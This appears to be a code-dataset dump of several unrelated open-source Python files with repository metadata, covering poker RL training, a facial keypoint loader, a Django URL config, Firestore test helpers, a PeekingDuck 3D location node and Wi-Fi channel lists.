eval_env = rlcard.make('limit-holdem')
# Set the iterations numbers and how frequently we evaluate/save plot
evaluate_every = 100
save_plot_every = 1000
evaluate_num = 10000
episode_num = 10000000
# Set the the number of steps for collecting normalization statistics
# and intial memory size
memory_init_size = 1000
norm_step = 1000
# The paths for saving the logs and learning curves
root_path = './experiments/limit_holdem_nfsp_pytorch_result/'
log_path = root_path + 'log.txt'
csv_path = root_path + 'performance.csv'
figure_path = root_path + 'figures/'
# Set a global seed
set_global_seed(0)
# Set agents
# One NFSP agent per seat; they train against each other via env.run().
agents = []
for i in range(env.player_num):
    agent = NFSPAgent(scope='nfsp' + str(i),
                      action_num=env.action_num,
                      state_shape=env.state_shape,
                      hidden_layers_sizes=[512,512],
                      anticipatory_param=0.1,
                      min_buffer_size_to_learn=memory_init_size,
                      q_replay_memory_init_size=memory_init_size,
                      q_norm_step=norm_step,
                      q_mlp_layers=[512,512])
    agents.append(agent)
random_agent = RandomAgent(action_num=eval_env.action_num)
env.set_agents(agents)
# Evaluation pits the first trained agent against a random opponent.
eval_env.set_agents([agents[0], random_agent])
# Count the number of steps
step_counters = [0 for _ in range(env.player_num)]
# Init a Logger to plot the learning curve
logger = Logger(xlabel='timestep', ylabel='reward', legend='NFSP on Limit Texas Holdem', log_path=log_path, csv_path=csv_path)
for episode in range(episode_num):
    # First sample a policy for the episode
    for agent in agents:
        agent.sample_episode_policy()
    # Generate data from the environment
    trajectories, _ = env.run(is_training=True)
    # Feed transitions into agent memory, and train the agent
    for i in range(env.player_num):
        for ts in trajectories[i]:
            agents[i].feed(ts)
            step_counters[i] += 1
            # Train the agent
            # Training only starts after the warm-up period of
            # (memory_init_size + norm_step) feeds, then fires every 64 feeds.
            train_count = step_counters[i] - (memory_init_size + norm_step)
            if train_count > 0 and train_count % 64 == 0:
                rl_loss = agents[i].train_rl()
                sl_loss = agents[i].train_sl()
                print('\rINFO - Agent {}, step {}, rl-loss: {}, sl-loss: {}'.format(i, step_counters[i], rl_loss, sl_loss), end='')
    # Evaluate the performance. Play with random agents.
    if episode % evaluate_every == 0:
        reward = 0
        for eval_episode in range(evaluate_num):
            _, payoffs = eval_env.run(is_training=False)
            reward += payoffs[0]
        logger.log('\n########## Evaluation ##########')
        logger.log('Timestep: {} Average reward is {}'.format(env.timestep, float(reward)/evaluate_num))
        # Add point to logger
        logger.add_point(x=env.timestep, y=float(reward)/evaluate_num)
    # Make plot
    if episode % save_plot_every == 0 and episode > 0:
        logger.make_plot(save_path=figure_path+str(episode)+'.png')
# Make the final plot
# ('episode' holds its final value from the loop above.)
logger.make_plot(save_path=figure_path+'final_'+str(episode)+'.png')
| 0 | 0 | 0 |
7d06b8a1e935f41c825242385e77b3ec1e1c036d | 5,899 | py | Python | data_load.py | jesus-a-martinez-v/facial-keypoints | 08ab0dc7b4250533a329412fde68629ef13917b7 | [
"MIT"
] | null | null | null | data_load.py | jesus-a-martinez-v/facial-keypoints | 08ab0dc7b4250533a329412fde68629ef13917b7 | [
"MIT"
] | null | null | null | data_load.py | jesus-a-martinez-v/facial-keypoints | 08ab0dc7b4250533a329412fde68629ef13917b7 | [
"MIT"
] | null | null | null | import os
import random
import cv2
import matplotlib.image as mpimg
import numpy as np
import pandas as pd
import torch
from torch.utils.data import Dataset
class FacialKeypointsDataset(Dataset):
    """
    Face Landmarks dataset.
    """
    # NOTE(review): this copy carries only __init__; the __len__ and
    # __getitem__ needed by the torch Dataset protocol appear to have
    # been stripped (the full class appears later in the file).
    def __init__(self, csv_file, root_dir, transform=None):
        """
        Args:
            csv_file (string): Path to the csv file with annotations.
            root_dir (string): Directory with all the images.
            transform (callable, optional): Optional transform to be applied
                on a sample.
        """
        # Annotation table loaded once; one row per sample.
        self.key_pts_frame = pd.read_csv(csv_file)
        self.root_dir = root_dir
        self.transform = transform
# Transforms
# NOTE(review): in this copy the transform classes carry only their
# docstrings -- the __init__/__call__ implementations appear to have been
# stripped (full versions of these classes appear later in the file).
class Normalize(object):
    """
    Convert a color image to grayscale and normalize the color range to [0,1].
    """
class Rescale(object):
    """
    Rescale the image in a sample to a given size.
    Args:
        output_size (tuple or int): Desired output size. If tuple, output is
            matched to output_size. If int, smaller of image edges is matched
            to output_size keeping aspect ratio the same.
    """
class RandomCrop(object):
    """
    Crop randomly the image in a sample.
    Args:
        output_size (tuple or int): Desired output size. If int, square crop
            is made.
    """
class ToTensor(object):
    """
    Convert ndarrays in sample to Tensors.
    """
| 28.360577 | 92 | 0.583658 | import os
import random
import cv2
import matplotlib.image as mpimg
import numpy as np
import pandas as pd
import torch
from torch.utils.data import Dataset
class FacialKeypointsDataset(Dataset):
    """
    Face Landmarks dataset.

    Each CSV row describes one sample: the first column is the image file
    name (relative to ``root_dir``), the remaining columns are the
    flattened (x, y) keypoint coordinates.
    """
    def __init__(self, csv_file, root_dir, transform=None):
        """
        Args:
            csv_file (string): Path to the csv file with annotations.
            root_dir (string): Directory with all the images.
            transform (callable, optional): Optional transform to be applied
                on a sample.
        """
        self.key_pts_frame = pd.read_csv(csv_file)
        self.root_dir = root_dir
        self.transform = transform
    def __len__(self):
        # One sample per annotation row.
        return len(self.key_pts_frame)
    def __getitem__(self, index):
        row = self.key_pts_frame.iloc[index]
        image = mpimg.imread(os.path.join(self.root_dir, row.iloc[0]))
        # Drop the alpha channel if the image carries one (RGBA -> RGB).
        if image.shape[2] == 4:
            image = image[:, :, 0:3]
        # Remaining columns are keypoints; reshape to (num_points, 2).
        key_pts = row.iloc[1:].values.astype('float').reshape(-1, 2)
        sample = {'image': image, 'keypoints': key_pts}
        if self.transform:
            sample = self.transform(sample)
        return sample
# Tranforms
class Normalize(object):
    """
    Convert a color image to grayscale and normalize the color range to [0,1].
    """
    def __call__(self, sample):
        # Grayscale conversion, then pixel values from [0, 255] into [0, 1].
        gray = cv2.cvtColor(sample['image'], cv2.COLOR_RGB2GRAY)
        gray = gray / 255.0
        # Center keypoints around 0 with roughly unit spread:
        # (pts - mean) / std with mean = 100, std = 50.
        pts = (np.copy(sample['keypoints']) - 100) / 50.0
        return {'image': gray,
                'keypoints': pts}
class Rescale(object):
    """
    Rescale the image in a sample to a given size.

    Args:
        output_size (tuple or int): Desired output size. If tuple, output is
            matched to output_size. If int, smaller of image edges is matched
            to output_size keeping aspect ratio the same.
    """
    def __init__(self, output_size):
        assert isinstance(output_size, (int, tuple))
        self.output_size = output_size
    def __call__(self, sample):
        image, key_pts = sample['image'], sample['keypoints']
        h, w = image.shape[:2]
        if isinstance(self.output_size, int):
            # Match the shorter edge to output_size, preserving aspect ratio.
            if h > w:
                new_h, new_w = self.output_size * h / w, self.output_size
            else:
                new_h, new_w = self.output_size, self.output_size * w / h
        else:
            new_h, new_w = self.output_size
        new_h, new_w = int(new_h), int(new_w)
        scaled = cv2.resize(image, (new_w, new_h))
        # Keypoints scale by the same per-axis factors as the image.
        key_pts = key_pts * [new_w / w, new_h / h]
        return {'image': scaled,
                'keypoints': key_pts}
class RandomHorizontalFlip(object):
    """
    Randomly mirror the sample's image and keypoints left-to-right.

    With probability ``flip_probability`` the image is flipped horizontally
    and every keypoint x-coordinate is mirrored about the image center;
    otherwise the sample is returned unchanged.
    """
    def __init__(self):
        # Chance that a given sample is flipped.
        self.flip_probability = 0.5
    def __call__(self, sample):
        # BUGFIX: the original flipped when random() > flip_probability,
        # i.e. with probability (1 - flip_probability). At the default 0.5
        # the distribution was the same, but the semantics were inverted
        # for any other value. Now a flip occurs with probability
        # flip_probability, as the name promises.
        if random.random() >= self.flip_probability:
            return sample
        image = sample['image']
        key_pts = sample['keypoints']
        width = image.shape[1]
        flipped_image = cv2.flip(image, 1)
        # Mirror x about the center: x' = 2*center - x = width - x.
        # BUGFIX: unlike the original helper, this does not mutate the
        # caller's keypoint array in place.
        flipped_keypoints = np.array([[width - p[0], p[1]] for p in key_pts])
        return {'image': flipped_image,
                'keypoints': flipped_keypoints}
class RandomCrop(object):
    """
    Crop randomly the image in a sample.

    Args:
        output_size (tuple or int): Desired output size. If int, square crop
            is made.
    """
    def __init__(self, output_size):
        assert isinstance(output_size, (int, tuple))
        if isinstance(output_size, int):
            self.output_size = (output_size, output_size)
        else:
            assert len(output_size) == 2
            self.output_size = output_size
    def __call__(self, sample):
        image = sample['image']
        key_pts = sample['keypoints']
        height, width = image.shape[:2]
        new_height, new_width = self.output_size
        # BUGFIX: np.random.randint(0, 0) raises ValueError, so the original
        # crashed whenever the image already had exactly the crop size.
        top = np.random.randint(0, height - new_height) if height > new_height else 0
        left = np.random.randint(0, width - new_width) if width > new_width else 0
        image = image[top: top + new_height, left: left + new_width]
        # Shift keypoints into the cropped frame of reference.
        key_pts = key_pts - [left, top]  # Broadcasting
        return {'image': image,
                'keypoints': key_pts}
class ToTensor(object):
    """
    Convert ndarrays in sample to Tensors.
    """
    def __call__(self, sample):
        image = sample['image']
        key_pts = sample['keypoints']
        # Grayscale images get an explicit single channel dimension.
        if image.ndim == 2:
            image = image.reshape(image.shape[0], image.shape[1], 1)
        # numpy stores H x W x C, torch expects C x H x W.
        chw = image.transpose((2, 0, 1))
        return {'image': torch.from_numpy(chw),
                'keypoints': torch.from_numpy(key_pts)}
| 4,163 | 14 | 292 |
890e4c7f12b5b3b533294613e48301232b0d8c3c | 841 | py | Python | todo_report/auth_server_client.py | sergio-bershadsky/todo.report | fa135fae2dadbcab4483a96a435db8ea6c073668 | [
"MIT"
] | null | null | null | todo_report/auth_server_client.py | sergio-bershadsky/todo.report | fa135fae2dadbcab4483a96a435db8ea6c073668 | [
"MIT"
] | null | null | null | todo_report/auth_server_client.py | sergio-bershadsky/todo.report | fa135fae2dadbcab4483a96a435db8ea6c073668 | [
"MIT"
] | null | null | null | import requests
| 27.129032 | 71 | 0.588585 | import requests
class AuthServerClient:
    """Thin HTTP client for the todo.report authentication server."""

    @property
    def server_url(self):
        """Base URL of the auth server."""
        #return "http://localhost:8000/"
        return "https://urbamatica.appspot.com/"

    def get_authorize_url(self, provider):
        """Fetch the OAuth authorize URL for *provider*."""
        return self.call("get_authorize_url", "get", provider=provider)

    def get_token(self, state):
        """Exchange an OAuth *state* for a token."""
        return self.call("get_token", "post", state=state)

    def call(self, name, method, **params):
        """Issue *method* request to endpoint *name*.

        Params travel in the query string for GET and in the form body
        otherwise. Returns parsed JSON, or the raw bytes when the
        response is not JSON.
        """
        base = self.server_url.rstrip("/")
        is_get = method.lower() == "get"
        response = requests.request(
            method,
            f"{base}/{name}",
            params=params if is_get else None,
            data=None if is_get else params,
        )
        try:
            return response.json()
        except ValueError:
            return response.content
| 677 | 124 | 23 |
dffb9c0e062cdd510faab296053db97cdaa1a672 | 516 | py | Python | boop/lib/channels.py | Seabreg/BoopSuite | 1c4e68d02badf9ece2ed765d7ba7fffb8dd57fc9 | [
"MIT"
] | 514 | 2017-07-10T22:29:36.000Z | 2022-03-24T12:06:08.000Z | boop/lib/channels.py | Seabreg/BoopSuite | 1c4e68d02badf9ece2ed765d7ba7fffb8dd57fc9 | [
"MIT"
] | 18 | 2017-08-13T01:57:32.000Z | 2020-08-03T19:56:10.000Z | boop/lib/channels.py | Seabreg/BoopSuite | 1c4e68d02badf9ece2ed765d7ba7fffb8dd57fc9 | [
"MIT"
] | 116 | 2017-08-05T09:10:42.000Z | 2021-11-12T10:42:10.000Z | TWOHERTZ = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
# 5 GHz channel numbers. (The name says "hertz", but these look like the
# standard 5 GHz band Wi-Fi channel IDs -- confirm against callers.)
FIVEHERTZ = [
    36, 40, 44, 48, 52, 56, 60, 64,
    100, 104, 108, 112, 116, 132, 136, 140,
    149, 153, 157, 161, 165,
]
# Every channel: the 2.4 GHz list (1-11, see TWOHERTZ above) followed by
# the 5 GHz list, in the same order.
ALL = [
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11,
    36, 40, 44, 48, 52, 56, 60, 64,
    100, 104, 108, 112, 116, 132, 136, 140,
    149, 153, 157, 161, 165,
]
| 8.459016 | 46 | 0.302326 | TWOHERTZ = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
# 5 GHz channel numbers. (The name says "hertz", but these look like the
# standard 5 GHz band Wi-Fi channel IDs -- confirm against callers.)
FIVEHERTZ = [
    36, 40, 44, 48, 52, 56, 60, 64,
    100, 104, 108, 112, 116, 132, 136, 140,
    149, 153, 157, 161, 165,
]
# Every channel: the 2.4 GHz list (1-11, see TWOHERTZ above) followed by
# the 5 GHz list, in the same order.
ALL = [
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11,
    36, 40, 44, 48, 52, 56, 60, 64,
    100, 104, 108, 112, 116, 132, 136, 140,
    149, 153, 157, 161, 165,
]
| 0 | 0 | 0 |
e0cadd9390762e552fb2dde0b50ff58b7778b895 | 403 | py | Python | concepts/arrays/unique_char_in_string.py | dnootana/Python | 2881bafe8bc378fa3cae50a747fcea1a55630c63 | [
"MIT"
] | 1 | 2021-02-19T11:00:11.000Z | 2021-02-19T11:00:11.000Z | concepts/arrays/unique_char_in_string.py | dnootana/Python | 2881bafe8bc378fa3cae50a747fcea1a55630c63 | [
"MIT"
] | null | null | null | concepts/arrays/unique_char_in_string.py | dnootana/Python | 2881bafe8bc378fa3cae50a747fcea1a55630c63 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3.8
print(uni_char1('abcdaefg')) | 15.5 | 39 | 0.682382 | #!/usr/bin/env python3.8
def uni_char(string):
    """Return True iff no character occurs more than once in *string*."""
    return len(set(string)) == len(string)
def uni_char1(string):
    """Set-based scan: bail out on the first repeated character."""
    seen = set()
    for ch in string:
        if ch in seen:
            return False
        seen.add(ch)
    return True
def uni_char2(string):
    """Dict-based variant of uni_char1 (the dict doubles as a seen-set)."""
    marked = {}
    for ch in string:
        if ch in marked:
            return False
        marked[ch] = True
    return True
# Demo: 'abcdaefg' contains 'a' twice, so this prints False.
print(uni_char1('abcdaefg'))
49eae1dda744367d8fab8df4d149cd4f4d3e0711 | 1,639 | py | Python | maps/urls.py | bhavanat12/GCH | 02013b49d66858718d7744ba074bf9875983e00d | [
"MIT"
] | null | null | null | maps/urls.py | bhavanat12/GCH | 02013b49d66858718d7744ba074bf9875983e00d | [
"MIT"
] | null | null | null | maps/urls.py | bhavanat12/GCH | 02013b49d66858718d7744ba074bf9875983e00d | [
"MIT"
] | null | null | null | from django.urls import path
from .views import RecipientDetails, MeetSchedule, DashboardView, MyMapView, SubmitMap, submitForReview,AdminGraphView, FinalSubmit, Approval, SentForApprovalMap, SaveApprovedVersion, GetLatestRevision, CommentSubmit, Discard, ReviewerReview, embedded_signing_ceremony, get_access_code, auth_login, sign_complete
from django.conf.urls import url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
    # Dashboard and map editing views.
    path('', DashboardView, name='dashboard-home'),
    path('MyMapView/', MyMapView, name='my-map-view'),
    path('submitMap/', SubmitMap),  # NOTE(review): no name= -- not reverse()-able.
    path('submitForReview/', submitForReview, name='submit-review'),
    path('AdminMapView/', AdminGraphView, name='admin-graph-view'),
    path('FinalSubmit/', FinalSubmit),  # NOTE(review): no name= -- not reverse()-able.
    # Approval / revision workflow.
    path('approve/', Approval, name='user-approve'),
    path('ApprovedMap/', SentForApprovalMap, name='approved-map'),
    path('SaveRevision/', SaveApprovedVersion, name='approved-revision'),
    path('GetLatestRevision/', GetLatestRevision, name='latest-revision'),
    path('CommentSubmit/', CommentSubmit, name='comment-submit'),
    path('Discard/', Discard, name='discard'),
    path('reviewerReview/', ReviewerReview, name='reviewer-review'),
    path('meetSchedule/', MeetSchedule, name='meet-schedule'),
    path('recipients/', RecipientDetails, name='recipients'),
    # Legacy regex routes (django.conf.urls.url) for the e-signing flow.
    url(r'^get_signing_url/$', embedded_signing_ceremony, name='get_signing_url'),
    url(r'^get_access_code/$', get_access_code, name='get_access_code'),
    url(r'^auth_login/$', auth_login, name='auth_login'),
    url(r'^sign_completed/$', sign_complete, name='sign_completed'),
]
| 60.703704 | 312 | 0.744966 | from django.urls import path
from .views import RecipientDetails, MeetSchedule, DashboardView, MyMapView, SubmitMap, submitForReview,AdminGraphView, FinalSubmit, Approval, SentForApprovalMap, SaveApprovedVersion, GetLatestRevision, CommentSubmit, Discard, ReviewerReview, embedded_signing_ceremony, get_access_code, auth_login, sign_complete
from django.conf.urls import url
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
    # Dashboard and map editing views.
    path('', DashboardView, name='dashboard-home'),
    path('MyMapView/', MyMapView, name='my-map-view'),
    path('submitMap/', SubmitMap),  # NOTE(review): no name= -- not reverse()-able.
    path('submitForReview/', submitForReview, name='submit-review'),
    path('AdminMapView/', AdminGraphView, name='admin-graph-view'),
    path('FinalSubmit/', FinalSubmit),  # NOTE(review): no name= -- not reverse()-able.
    # Approval / revision workflow.
    path('approve/', Approval, name='user-approve'),
    path('ApprovedMap/', SentForApprovalMap, name='approved-map'),
    path('SaveRevision/', SaveApprovedVersion, name='approved-revision'),
    path('GetLatestRevision/', GetLatestRevision, name='latest-revision'),
    path('CommentSubmit/', CommentSubmit, name='comment-submit'),
    path('Discard/', Discard, name='discard'),
    path('reviewerReview/', ReviewerReview, name='reviewer-review'),
    path('meetSchedule/', MeetSchedule, name='meet-schedule'),
    path('recipients/', RecipientDetails, name='recipients'),
    # Legacy regex routes (django.conf.urls.url) for the e-signing flow.
    url(r'^get_signing_url/$', embedded_signing_ceremony, name='get_signing_url'),
    url(r'^get_access_code/$', get_access_code, name='get_access_code'),
    url(r'^auth_login/$', auth_login, name='auth_login'),
    url(r'^sign_completed/$', sign_complete, name='sign_completed'),
]
| 0 | 0 | 0 |
95fac783ccf720a62910955d05435041390a95ce | 740 | py | Python | tests/commands/test_command.py | luoxiaohei/orator | d1738e5c81c6c9c64bf4c972c0b90586776c63da | [
"MIT"
] | null | null | null | tests/commands/test_command.py | luoxiaohei/orator | d1738e5c81c6c9c64bf4c972c0b90586776c63da | [
"MIT"
] | null | null | null | tests/commands/test_command.py | luoxiaohei/orator | d1738e5c81c6c9c64bf4c972c0b90586776c63da | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import os
import tempfile
from flexmock import flexmock
from orator.commands.command import Command
from . import OratorCommandTestCase
class FooCommand(Command):
    """
    Test Command
    """
    # NOTE(review): only the class attribute survives in this copy; the
    # handle() method appears to have been stripped.
    name = "foo"
| 20.555556 | 72 | 0.643243 | # -*- coding:utf-8 -*-
import os
import tempfile
from flexmock import flexmock
from orator.commands.command import Command
from . import OratorCommandTestCase
class FooCommand(Command):
    """
    Test Command
    """
    # CLI name under which this fixture command is registered.
    name = "foo"
    def handle(self):
        # No-op: the fixture only needs to exist so options can be parsed.
        pass
class CommandTestCase(OratorCommandTestCase):
    def test_get_py_config_and_require___file__(self):
        """Running with -c <file.py> executes the config with __file__ set."""
        # Throwaway Python config module that records its own path.
        filename = tempfile.mktemp(".py")
        with open(filename, "w") as f:
            f.write("foo = __file__")
        # flexmock spy: assert the real _get_config() is invoked and
        # returns {"foo": <path of the config file>}.
        command = flexmock(FooCommand())
        command.should_call("_get_config").and_return({"foo": filename})
        self.run_command(command, [("-c", filename)])
        if os.path.exists(filename):
            os.remove(filename)
| 397 | 24 | 76 |
92d20b7eced1c72eae2c0685c60678fcf8b161bb | 3,369 | py | Python | tests/unit/v1/_test_helpers.py | noxxious/python-firestore | 6b5a7795bb2827b65f8015fcef6663880a29a65d | [
"Apache-2.0"
] | 140 | 2020-02-16T19:35:47.000Z | 2022-03-27T23:58:03.000Z | tests/unit/v1/_test_helpers.py | noxxious/python-firestore | 6b5a7795bb2827b65f8015fcef6663880a29a65d | [
"Apache-2.0"
] | 311 | 2020-01-31T23:45:43.000Z | 2022-03-22T14:41:34.000Z | tests/unit/v1/_test_helpers.py | noxxious/python-firestore | 6b5a7795bb2827b65f8015fcef6663880a29a65d | [
"Apache-2.0"
] | 52 | 2020-01-31T21:40:11.000Z | 2022-02-25T18:32:51.000Z | # Copyright 2021 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import concurrent.futures
import datetime
import mock
import typing
import google
from google.cloud.firestore_v1.base_client import BaseClient
from google.cloud.firestore_v1.document import DocumentReference, DocumentSnapshot
from google.cloud._helpers import _datetime_to_pb_timestamp, UTC # type: ignore
from google.cloud.firestore_v1._helpers import build_timestamp
from google.cloud.firestore_v1.async_client import AsyncClient
from google.cloud.firestore_v1.client import Client
from google.protobuf.timestamp_pb2 import Timestamp # type: ignore
| 31.783019 | 87 | 0.700208 | # Copyright 2021 Google LLC All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import concurrent.futures
import datetime
import mock
import typing
import google
from google.cloud.firestore_v1.base_client import BaseClient
from google.cloud.firestore_v1.document import DocumentReference, DocumentSnapshot
from google.cloud._helpers import _datetime_to_pb_timestamp, UTC # type: ignore
from google.cloud.firestore_v1._helpers import build_timestamp
from google.cloud.firestore_v1.async_client import AsyncClient
from google.cloud.firestore_v1.client import Client
from google.protobuf.timestamp_pb2 import Timestamp # type: ignore
def make_test_credentials() -> google.auth.credentials.Credentials:  # type: ignore
    """Build a mock standing in for google-auth Credentials."""
    import google.auth.credentials  # type: ignore
    return mock.Mock(spec=google.auth.credentials.Credentials)
def make_client(project_name: typing.Optional[str] = None) -> Client:
    """Create a synchronous Firestore client backed by mock credentials."""
    return Client(
        project=project_name or "project-project", credentials=make_test_credentials(),
    )
def make_async_client() -> AsyncClient:
    """Create an asynchronous Firestore client backed by mock credentials."""
    return AsyncClient(project="project-project", credentials=make_test_credentials())
def build_test_timestamp(
    year: int = 2021,
    month: int = 1,
    day: int = 1,
    hour: int = 12,
    minute: int = 0,
    second: int = 0,
) -> Timestamp:
    """Build a protobuf Timestamp for the given UTC wall-clock time."""
    return _datetime_to_pb_timestamp(
        datetime.datetime(
            year=year,
            month=month,
            day=day,
            hour=hour,
            minute=minute,
            second=second,
            tzinfo=UTC,
        ),
    )
def build_document_snapshot(
    *,
    collection_name: str = "col",
    document_id: str = "doc",
    client: typing.Optional[BaseClient] = None,
    data: typing.Optional[typing.Dict] = None,
    exists: bool = True,
    create_time: typing.Optional[Timestamp] = None,
    read_time: typing.Optional[Timestamp] = None,
    update_time: typing.Optional[Timestamp] = None,
) -> DocumentSnapshot:
    """Assemble a DocumentSnapshot with sensible test defaults."""
    return DocumentSnapshot(
        DocumentReference(collection_name, document_id, client=client),
        # NOTE(review): {"hello", "world"} is a *set*, although the
        # parameter is annotated Dict -- probably meant {"hello": "world"}.
        data or {"hello", "world"},
        exists=exists,
        read_time=read_time or build_timestamp(),
        create_time=create_time or build_timestamp(),
        update_time=update_time or build_timestamp(),
    )
class FakeThreadPoolExecutor:
    """Synchronous stand-in for concurrent.futures.ThreadPoolExecutor.

    ``submit`` runs the callable immediately on the calling thread and
    returns an already-resolved Future.
    """
    def __init__(self, *args, **kwargs):
        # Accepts (and ignores) the real executor's constructor arguments.
        self._shutdown = False
    def submit(self, callable) -> "concurrent.futures.Future":
        # BUGFIX: the original annotated the return type as typing.NoReturn,
        # but this method plainly returns a Future.
        if self._shutdown:
            raise RuntimeError(
                "cannot schedule new futures after shutdown"
            )  # pragma: NO COVER
        future = concurrent.futures.Future()
        future.set_result(callable())
        return future
    def shutdown(self):
        """Mark the executor closed; later submit() calls raise."""
        self._shutdown = True
    def __repr__(self):
        return f"FakeThreadPoolExecutor(shutdown={self._shutdown})"
| 1,960 | 8 | 245 |
0796a1a08ccd54c91e9b96ca9f9dfe700c1debed | 2,412 | py | Python | peekingduck/pipeline/nodes/dabble/bbox_to_3d_loc.py | diwei-tan/PeekingDuck | 0169365580160f02be86fc8979a9915b8cefffcd | [
"Apache-2.0"
] | 1 | 2021-08-19T09:39:14.000Z | 2021-08-19T09:39:14.000Z | peekingduck/pipeline/nodes/dabble/bbox_to_3d_loc.py | sidney-tio/PeekingDuck | 966734ab81c9e466ab51495644673c2d52daf17c | [
"Apache-2.0"
] | null | null | null | peekingduck/pipeline/nodes/dabble/bbox_to_3d_loc.py | sidney-tio/PeekingDuck | 966734ab81c9e466ab51495644673c2d52daf17c | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 AI Singapore
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Estimates the 3D coordinates of an object given a 2D bounding box
"""
from typing import Dict, Any
import numpy as np
from peekingduck.pipeline.nodes.node import AbstractNode
class Node(AbstractNode):
    """Node that uses 2D bounding boxes information to estimate 3D location.

    Inputs:
        |bboxes|

    Outputs:
        |obj_3D_locs|

    Configs:
        focal_length (:obj:`float`): **default = 1.14**
            Approximate focal length of webcam used, in metres. Example on measuring focal length:
            https://learnopencv.com/approximate-focal-length-for-webcams-and-cell-phone-cameras/
        height_factor (:obj:`float`): **default = 2.5**
            A factor used to estimate real-world distance from pixels, based on average human height
            in metres. The value varies across different camera set-ups, and calibration may be
            required.
    """

    def __init__(self, config: Dict[str, Any] = None, **kwargs: Any) -> None:
        # Restore the standard PeekingDuck node constructor so config values
        # (focal_length, height_factor) are loaded onto the instance; run()
        # reads them as self.focal_length / self.height_factor.
        super().__init__(config, node_path=__name__, **kwargs)

    def run(self, inputs: Dict[str, Any]) -> Dict[str, Any]:
        """Converts 2D bounding boxes into 3D locations.
        """
        locations = []
        for bbox in inputs["bboxes"]:
            # Subtraction is to make the camera the origin of the coordinate system
            center_2d = ((bbox[0:2] + bbox[2:4]) * 0.5) - np.array([0.5, 0.5])
            bbox_height = bbox[3] - bbox[1]

            z_coord = (self.focal_length * self.height_factor) / bbox_height
            x_coord = (center_2d[0] * self.height_factor) / bbox_height
            y_coord = (center_2d[1] * self.height_factor) / bbox_height

            point = np.array([x_coord, y_coord, z_coord])
            locations.append(point)

        outputs = {"obj_3D_locs": locations}
        return outputs
| 33.971831 | 100 | 0.659204 | # Copyright 2021 AI Singapore
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Estimates the 3D coordinates of an object given a 2D bounding box
"""
from typing import Dict, Any
import numpy as np
from peekingduck.pipeline.nodes.node import AbstractNode
class Node(AbstractNode):
    """Node that uses 2D bounding boxes information to estimate 3D location.

    Inputs:
        |bboxes|

    Outputs:
        |obj_3D_locs|

    Configs:
        focal_length (:obj:`float`): **default = 1.14**
            Approximate focal length of webcam used, in metres. Example on measuring focal length:
            https://learnopencv.com/approximate-focal-length-for-webcams-and-cell-phone-cameras/
        height_factor (:obj:`float`): **default = 2.5**
            A factor used to estimate real-world distance from pixels, based on average human height
            in metres. The value varies across different camera set-ups, and calibration may be
            required.
    """

    def __init__(self, config: Dict[str, Any] = None, **kwargs: Any) -> None:
        super().__init__(config, node_path=__name__, **kwargs)

    def run(self, inputs: Dict[str, Any]) -> Dict[str, Any]:
        """Converts 2D bounding boxes into 3D locations.
        """
        obj_locs = []
        for bbox in inputs["bboxes"]:
            # Shift the bbox centre so the camera sits at the coordinate origin.
            centre = (bbox[0:2] + bbox[2:4]) * 0.5 - np.array([0.5, 0.5])
            height_px = bbox[3] - bbox[1]

            # Scale pixel offsets to metres using the average-height heuristic.
            x = (centre[0] * self.height_factor) / height_px
            y = (centre[1] * self.height_factor) / height_px
            z = (self.focal_length * self.height_factor) / height_px
            obj_locs.append(np.array([x, y, z]))

        return {"obj_3D_locs": obj_locs}
| 115 | 0 | 27 |
9602435d9907a9497d021fa9099436c498c55a95 | 2,731 | py | Python | tests/test_file_configuration.py | joshua-s/punch | c29751844ecf654cc21966a14842e8165e0bc300 | [
"ISC"
] | null | null | null | tests/test_file_configuration.py | joshua-s/punch | c29751844ecf654cc21966a14842e8165e0bc300 | [
"ISC"
] | null | null | null | tests/test_file_configuration.py | joshua-s/punch | c29751844ecf654cc21966a14842e8165e0bc300 | [
"ISC"
] | null | null | null | import pytest
from punch import file_configuration as fc
# Bug fix: these three decorators had no functions attached (a syntax error).
# The fixture bodies are restored.
@pytest.fixture
def global_variables():
    """Global punch variables shared by the tests."""
    return {
        'serializer': '{{ major }}.{{ minor }}.{{ patch }}',
        'mark': 'just a mark'
    }


@pytest.fixture
def local_variables():
    """Per-file variables that override the global ones."""
    return {
        'serializer': '{{ major }}.{{ minor }}'
    }


@pytest.fixture
def file_configuration_dict():
    """Raw dict form of a file configuration."""
    return {
        'path': 'pkg/__init__.py',
        'serializer': '{{ major }}.{{ minor }}'
    }
| 26.259615 | 73 | 0.660198 | import pytest
